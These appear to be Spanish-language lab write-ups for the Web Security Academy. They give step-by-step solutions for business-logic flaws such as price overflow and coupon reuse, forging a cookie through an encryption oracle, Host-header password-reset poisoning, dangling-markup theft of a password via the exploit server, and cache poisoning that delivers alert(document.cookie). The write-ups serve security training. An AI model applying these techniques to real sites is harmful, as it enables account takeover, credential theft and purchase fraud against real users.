- Añadir al carrito el producto Lightweight "l33t" Leather Jacket
- En el checkout ajustar la cantidad negativa del otro producto de manera que el costo total sea > $0 (ya que esto sí es controlado, por lo que se obtiene un error) y < $100 (crédito en la tienda)
- Completar la orden
Se pueden pedir hasta 99 unidades de cada producto por vez, pero esto se puede realizar múltiples veces dentro de una misma compra. Esto se puede aprovechar para desbordar la variable que almacena el precio total de la compra, cuyo máximo valor es 21.474.836,47.
- Precio a sumar = 21.474.836 * 2 = 42.949.672 (desde 0 a 21.474.836 y desde -21.474.836 a 0)
- Costo de cada orden = 1.337 * 99 = 132.363
- Cantidad de órdenes de 99 Lightweight "l33t" Leather Jacket = 42.949.672 / 132.363 = 324,48
- Iniciar sesión con las credenciales proporcionadas (wiener:peter)
- Añadir 99 Lightweight "l33t" Leather Jacket al carrito
- Repetir la request anterior 323 veces. El total de unidades debería ser 32076 y el precio de la orden -$64.060,96
- Añadir otros producto de manera que el precio quede entre $0 y $100 (por ejemplo 47 unidades de Lightweight "l33t" Leather Jacket y 16 unidades de Conversation Controlling Lemon: 47 * $1337 + 16 * $80.72 = 64.130,52)
- Completar la orden
No pudimos resolver el laboratorio porque se requiere usar las Engagement tools (dentro de Target -> Site map), que sólo están disponibles en la versión Pro de Burp Suite.
No pudimos resolver el laboratorio porque se requiere usar las Engagement tools (dentro de Target -> Site map), que sólo están disponibles en la versión Pro de Burp Suite.
Para resolver este laboratorio se debe:
- Iniciar sesión en el sitio vulnerable, ir a "My account", activar Intercept y cambiar la contraseña.
- En la request interceptada, eliminar el parámetro
current-password
. - En la misma request, cambiar el valor del parámetro
username
poradministrator
. - Forwardear la request.
- Cerrar sesión e iniciar sesión como administrator con la contraseña cambiada.
- Ir al panel de administración y eliminar al usuario carlos.
- Con Intercept activado, iniciar sesión y comprar cualquier producto que esté dentro del crédito disponible (por ejemplo, un Beat the Vacation Traffic).
- La última request interceptada, cuando se compra algo (la de
POST /cart/checkout
), redirige a una página que confirma que la compra fue exitosa. Esa request hay que enviar a Repeater. - Agregar un Lightweight l33t leather jacket al carrito.
- Con Repeater volver a enviar la request de confirmación de compra. La compra se completa y no se descuenta saldo.
No pudimos resolver el laboratorio porque se requiere usar las Engagement tools (dentro de Target -> Site map), que sólo están disponibles en la versión Pro de Burp Suite.
Para resolver este laboratorio se debe:
- Iniciar sesión en el sitio vulnerable. Los nuevos usuarios pueden usar el cupón de descuento
NEWCUST5
. - Al final de la página, suscribirse al newsletter. Entonces se puede usar otro código más,
SIGNUP30
. - Agregar un Lightweight l33t leather jacket al carrito.
- Ir al checkout y aplicar ambos cupones.
- Si se intenta aplicar dos veces seguidas un mismo cupón, sale un error. Sin embargo, si se van alternando los cupones, no da ningún error.
- Reutilizar ambos cupones hasta que el total de la compra sea menor al saldo disponible y comprar el producto.
Para resolver este laboratorio se debe:
- Con el Intercept de Burp activado, iniciar sesión y suscribirse al newsletter para obtener un cupón de descuento
SIGNUP30
. - Agregar al carrito una
Gift card
e ir al checkout. Aplicar el código para obtener un 30% de descuento. Confirmar la orden y copiar el código de la gift card. - Ir a My account y redimir la gift card. Esto agrega $3 al saldo de la tienda.
- En HTTP history, la request
POST /gift-card
contiene el código de la misma al redimirse. - Ir a "Project options" > "Sessions". En el panel "Session handling rules" hacer clic en "Add". Se abre el diálogo "Session handling rule editor".
- Ir a la pestaña "Scope". Dentro de "URL Scope" seleccionar "Include all URLs".
- Volver a la pestaña "Details". Dentro de "Rule actions" hacer clic en "Add" > "Run a macro". Dentro de "Select macro" hacer clic en "Add" para abrir el Macro Recorder.
- Seleccionar las siguientes requests (en este orden), Después hacer clic en "OK". Se abre el Macro editor.
POST /cart
POST /cart/coupon
POST /cart/checkout
GET /cart/order-confirmation?order-confirmed=true
POST /gift-card
- En la lista de requests, seleccionar
GET /cart/order-confirmation?order-confirmed=true
. Hacer clic en "Configure item". En el diálogo que se abre hacer clic en "Add" para crear un nuevo parámetro, al que ahy que llamarlogift-card
. Seleccionar el código de la gift card al final de la response. Hacer clic en "OK" dos veces para volver al Macro Editor. - Seleccionar la request
POST /gift-card
y hacer clic en "Configure item" otra vez. En la sección "Parameter handling" seleccionar "Derive from prior response" del drop-down al lado degift-card
, y en el de al lado seleccionar "Response 4". Hacer clic en "OK". - En el Macro Editor, hacer clic en "Test macro". Ver el código de la gift card generado en la response a
GET /cart/order-confirmation?order-confirmation=true
. Asegurarse que el parámetrogift-card
dePOST /gift-card request
coincide con el código anterior y de que la response tiene código 302. Hacer clic en "OK" hasta volver a la ventana principal del Burp. - Enviar la request
GET /my-account
a Intruder. Usar el ataque "Sniper" y hacer clic en "Clear §". - En la pestaña "Payloads", seleccionar el tipo de payload "Null payloads". Dentro de "Payload options" elegir generar 412 payloads. En la pestaña "Options", poner el "thread count" en 1. Empezar el ataque.
- Cuando termine el ataque, comprar el Lightweight l33t leather jacket y listo.
Para resolver este lab se debe:
- Iniciar sesión con la opción "Stay logged in" activada y hacer un comentario. En la request interceptada por Burp la cookie
stay-logged-in
está encriptada. - Hacer otro comentario pero con una dirección de correo inválida (ej:
foofoofoobarbarbar
). En la response habrá una cookienotification
encriptada, y luego se redirige a la entrada del blog. - En el blog va a haber un mensaje de error
Invalid email address: email-invalido-ingresado
. Al parecer, eso se desencripta de la cookie denotification
. Enviar las requestPOST /post/comment
yGET /post?postId=x
a Repeater. - Dentro de Repeaterm se puede usar el parámetro
email
del POST para encriptar cualquier cosa, y ver el texto cifrado en el headerSet-Cookie
. También se puede usar la cookienotification
del GET para desencriptar otra cualquier cosa y ver el resultado en el mensaje de error del blog (el laboratorio recomienda renombrar las pestañas de ambas request, para saber cuál encripta y cuál desencripta). - En la request de desencriptar, copiar la cookie
stay-logged-in
y pegarla ennotification
. Enviar la request. Ahora la response ya no tiene mensaje de error, sino que tiene esa cookie pero desencriptada. El formato de salida esusario:timestamp
. Copiar el timestamp. - Ir a la request de encriptar y cambiar el parámetro
email
poradministrator:timestamp
. Enviar la request y copiar el nuevo valor denotification
de la response. - Desencriptar el valor obtenido. Sea cual sea el valor ques se pase, se agrega el prefijo
Invalid email address:
. Enviar el valor denotification
a Decoder. - En Decoder, decodear en URL y Base64 la cookie. Seleccionar "Hex", hacer clic derecho en el primer byte, seleccionar "Delete bytes" y eliminar 23 bytes (para limpiar el mensaje de Invalid email).
- Volver a encodear el resultado, copiarlo en
notification
y enviar la request. Ahora en la response va a haber un mensaje de error, indicando que la entrada a encriptar debe ser múltiplo de 16 (porque usa un algoritmo de encriptación por bloques). - Volver a la request de encriptar en Repeater y agregar 9 caracteres cualesquiera al comienzo del valor de
email
(por ejemplo:xxxxxxxxxadministrator:your-timestamp
). Enviar la request y desencriptar. - Enviar el texto cifrado a Decoder y volver a decodear como antes. Eliminar 32 bytes al comienzo. Volver a encodear y pegar el resultado en
notification
. Ahora el resultado en la response debería seradministrator:timestamp
. - En HTTP history, enviar la request
GET /
a Repeater. Borrar la cookiesession
y reemplazar la cookiestay-logged-in
con el último texto cifrado. Enviar la request, y ahora se va a estar logueado como administrator. - Usando Repeater, navegar a
/admin/delete?username=carlos
para resolver el laboratorio.
Para resolver este laboratorio, se debe analizar la funcionalidad "Forgot password?" de la sección Login. Al hacer click en el mismo, si vamos al exploit server y luego hacemos click en Email Client nos aparecerá un mail con una url para restablecer la contraseña de la cuenta con la que nos autenticamos (wiener). Al analizar esta url se observa que la misma contiene un token. En el HTTP History de burpsuite, buscamos el POST de "/forgot-password" y lo mandamos al repeater. Analizamos la petición probando distintos host, notando que la respuesta sigue siendo con status 200. Aprovechando esto, cambiamos el host header al dominio del exploit server del laboratorio, y cambiamos el parametro username a "carlos". Yendo al exploit server, y buscando por "/forgot-password", vemos que tiene un token como parámetro, el cual vamos a meter en la url del correo recibido en primera instancia al clickear sobre Forgot password, y visitando esta página en el navegador y cambiando la contraseña de carlos por una nueva, para luego autenticarse con la misma, el laboratorio queda resuelto.
Similar al laboratorio anterior, pero ahora al cambiar el host header del POST en "/forgot-password", devuelve un status 504. Por lo que se procede a probar con el mismo host seguido de ":puertoArbitrario". A partir de esto, se puede deducir la concatenación del siguiente href:
```html
'<a href="//ac571fd61fa20fdd8074141c015b0054.web-security-academy.net//?
```
Donde la URL es la dirección del exploit server. En el parámetro username del csrf de la petición lo cambiamos por carlos, y luego de enviarlo vamos a ver los logs del explit server buscando "password" (aparecerá el texto que nos llegó en el mail en primera instancia al hacer click en forgot password), copiamos el string que le sigue a esta palabra, el cual es la contraseña del usuario carlos, y nos logueamos con la misma.
Para resolver este laboratorio, analizamos el GET que se hace al entrar al laboratorio, lo mandamos al repeater, y probamos enviar peticiones prestando atención en los headers X-Cache y Cache-Control. Al agregar un parámetro arbitrario a la request "limpiamos caché" y obtenemos una nueva respuesta del servidor. Probando agregar un segundo header para el host, se puede ver en el body de la respuesta que este se refleja en la url /resources/js/tracking.js. Lo siguiente es el ir al exploit server y en el input file ponemos /resources/js/tracking.js, y en el body el alert con el document.cookie. En el segundo host header en el repetidor ponemos la url del exploit server. Enviamos la request y repetimos el proceso limpiando "destructores de caché" (los parámetros arbitrarios que agregamos para obtener una respuesta del servidor) y actualizando la página de inicio hasta que el laboratorio se marque como solved.
Al intentar acceder a /admin desde el navegador en el laboratorio, nos sale el mensaje Admin Interface Only Available for local users. Analizando esta request con burpsuite, mandándola al repeater, cambiamos el contenido de host header por localhost, con lo que accedemos al panel de administración con la opción de eliminar usuarios. Cambiamos la solicitud por /admin/delete?username=carlos
No pudimos resolver el laboratorio porque se requiere usar el Burp Collaborator Client, que sólo están disponibles en la versión Pro de Burp Suite.
No pudimos resolver el laboratorio porque se requiere usar el Burp Collaborator Client, que sólo están disponibles en la versión Pro de Burp Suite.